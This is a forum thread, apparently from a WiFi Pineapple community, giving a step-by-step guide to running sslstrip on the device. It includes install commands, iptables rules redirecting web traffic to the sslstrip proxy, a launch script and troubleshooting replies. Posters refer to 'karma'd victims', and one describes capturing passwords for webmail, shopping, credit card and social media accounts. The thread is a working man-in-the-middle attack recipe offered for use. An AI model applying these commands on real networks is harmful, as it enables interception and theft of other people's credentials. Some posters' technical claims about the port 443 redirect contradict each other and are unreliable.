telot Posted June 17, 2012 Share Posted June 17, 2012 Ok - theres never been a straight up "How to get sslstrip working" thread - theres quite a few bits and pieces and theres always WM's module...but people still seem to be confused. I am to put a stop to this via this here guide. 1. Install sslstrip: opkg update opkg install --dest usb sslstrip Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this: opkg install sslstrip (herpaderp) 2. One time configuration of sslstrip: A HUGE thanks to Vulture for laying this out for us: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py 3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 4. run sslstrip! sslstrip -w /usb/sslstrip.log & Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet! Hope you all enjoy telot Quote Link to comment Share on other sites More sharing options...
shadowmmm Posted June 17, 2012 Share Posted June 17, 2012 thank you telot Quote Link to comment Share on other sites More sharing options...
BigFanOHak5 Posted June 17, 2012 Share Posted June 17, 2012 (edited) Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till i get my TTL cable to do a clean flash. Edited June 17, 2012 by BigFanOHak5 Quote Link to comment Share on other sites More sharing options...
thaihenry Posted June 17, 2012 Share Posted June 17, 2012 Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 Also I am having a problem with direction iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated. Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used? Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till i get my TTL cable to do a clean flash. Quote Link to comment Share on other sites More sharing options...
legion Posted June 18, 2012 Share Posted June 18, 2012 (edited) Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 lol... that's the point of sslstrip. It decrypts SSL and re-packages it. Here's more info on it: http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/ Edited June 18, 2012 by legion Quote Link to comment Share on other sites More sharing options...
abxy007 Posted June 18, 2012 Share Posted June 18, 2012 Nice Quote Link to comment Share on other sites More sharing options...
Vile Posted June 18, 2012 Share Posted June 18, 2012 I get this when I try to run it: root@Pineapple:/www# sslstrip -w /usb/test Traceback (most recent call last): File "/usb/usr/bin/sslstrip", line 27, in <module> from twisted.web import http File "/usb/usr/lib/python2.7/site-packages/twisted/web/http.py", line 36, in <module> from twisted.internet import interfaces, reactor, protocol, address, task File "/usb/usr/lib/python2.7/site-packages/twisted/internet/reactor.py", line 11, in <module> from twisted.internet import selectreactor File "/usb/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 21, in <module> from twisted.internet import error EOFError: EOF read where object expected dies after that any ideas? Quote Link to comment Share on other sites More sharing options...
thaihenry Posted June 18, 2012 Share Posted June 18, 2012 I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption. If you are going to quote a web page might as well be the author of the tool: Moxie Marlinspike http://www.thoughtcrime.org/software/sslstrip/ How does this work? First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example). At this point, sslstrip receives the traffic and does its magic. His site has clear details of how this works. There is no mention of redirecting taffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key. From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. You can do the same thing with other transparent proxies. lol... that's the point of sslstrip. It decrypts SSL and re-packages it. Here's more info on it: http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/ Quote Link to comment Share on other sites More sharing options...
telot Posted June 18, 2012 Author Share Posted June 18, 2012 Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 Also I am having a problem with direction iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated. Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used? I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share. telot Quote Link to comment Share on other sites More sharing options...
thaihenry Posted June 18, 2012 Share Posted June 18, 2012 talot, Thank you for your input, Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting. I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far. I have had no problem in the past getting sslstrip to work on a regular computer. Just wondering if IP tables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703 a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router? Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer? I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share. telot Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 18, 2012 Share Posted June 18, 2012 Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working. Quote Link to comment Share on other sites More sharing options...
telot Posted June 19, 2012 Author Share Posted June 19, 2012 Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working. TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :) telot Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 19, 2012 Share Posted June 19, 2012 (edited) TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I will add the port 443 in the next version, just in case :P I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :) telot I will see how I can add the possibility to start modules from the Button module. :) Edited June 19, 2012 by Whistle Master Quote Link to comment Share on other sites More sharing options...
hexomega Posted June 22, 2012 Share Posted June 22, 2012 I will add the port 443 in the next version, just in case :P This is a mistake. It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason. I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again. Quote Link to comment Share on other sites More sharing options...
BigFanOHak5 Posted July 5, 2012 Share Posted July 5, 2012 (edited) This is a mistake. It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason. I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again. Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts? Edited July 5, 2012 by BigFanOHak5 Quote Link to comment Share on other sites More sharing options...
Molotof Posted July 5, 2012 Share Posted July 5, 2012 Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts? You could wait a little bit and you will gain access to the webui or you could go to the shell and type : iptables -t nat -D PREROUTING 1 ......... then you will get the webui back. Quote Link to comment Share on other sites More sharing options...
sickduck Posted July 18, 2012 Share Posted July 18, 2012 Here is a script that will run the iptables command and launch sslstrip with the date and time as the logfile in /usb. It works when running it from a SSH terminal but for some reason it doesn't seem to work from the WPS button script. #!/bin/shiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000_now=$(date +"%Y%m%d-%H%M%S")_file="/usb/sslstrip_$_now.log"sslstrip -w $_file[/CODE] Quote Link to comment Share on other sites More sharing options...
sickduck Posted July 19, 2012 Share Posted July 19, 2012 What interface do you set tcpdump to monitor on? Quote Link to comment Share on other sites More sharing options...
7ncubane Posted August 9, 2012 Share Posted August 9, 2012 (edited) my thoughts after trying different suggestions: I'm using MkIV with 2.5. Connected via ethernet to laptop running Backtrack5r2. Installed sslstrip via command line to usb. tried running sslstrip via command line with different options. My results are 1. needed to edit /etc/sysctl.conf file as suggested in another post. 2. you need to forward both 80 and 443. Otherwise either http or https pages hang on loading while the other loads ok. Both seem to be neede for seemless browsing. 3. fix port forwarding after done with sslstrip. 4. had best results with running -k -p switches. I'll post how it goes with relay configuration with Alfa card next. Edited August 9, 2012 by 7ncubane Quote Link to comment Share on other sites More sharing options...
7ncubane Posted August 9, 2012 Share Posted August 9, 2012 Sorry for 2 postings in a row. I've been playing with sslstrip and noticed something. I was able to sniff my passwords on yahoo mail, gmail, amazon, capital one credit card, and twitter. However, when I tried Chase, Wells Fargo, and Charles Schwab, sign in pages would not even load. The the browser just got "stuck". It seems that sslstrip passes through http traffic ok and processes regular https traffic ok, but seems to be not able to process certain https sites. Anybody have similar experience? Any idea what this "non-standard https/ssl traffic might be? Quote Link to comment Share on other sites More sharing options...
sickduck Posted August 11, 2012 Share Posted August 11, 2012 Some mobile apps (like Facebook for Android) will not work at all when sslstrip is running Quote Link to comment Share on other sites More sharing options...
carmichaeldylan Posted August 11, 2012 Share Posted August 11, 2012 On iphone Facebook works but youtube, bank apps, and bank websites dont work. Aslo is there a way to run sslstrip with karma without the Pineapple restarting or am i the only one with that problem ? lol Quote Link to comment Share on other sites More sharing options...
7ncubane Posted August 13, 2012 Share Posted August 13, 2012 thanks for input. I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple. Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but url snarf need packets directly from port 80. (I think.) Quote Link to comment Share on other sites More sharing options...
PineDominator Posted August 14, 2012 Share Posted August 14, 2012 thanks for input. I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple. Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but url snarf need packets directly from port 80. (I think.) urlsnarf does not need iptable set up it just listens on port 80 Quote Link to comment Share on other sites More sharing options...
amoeba Posted August 18, 2012 Share Posted August 18, 2012 Cant get it to work, redirecting both 443 and 80 Edited /etc/sysctl.conf When i try to load a https site it just loading for a while and i get error loading page, Anyone have a good working guide on this? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.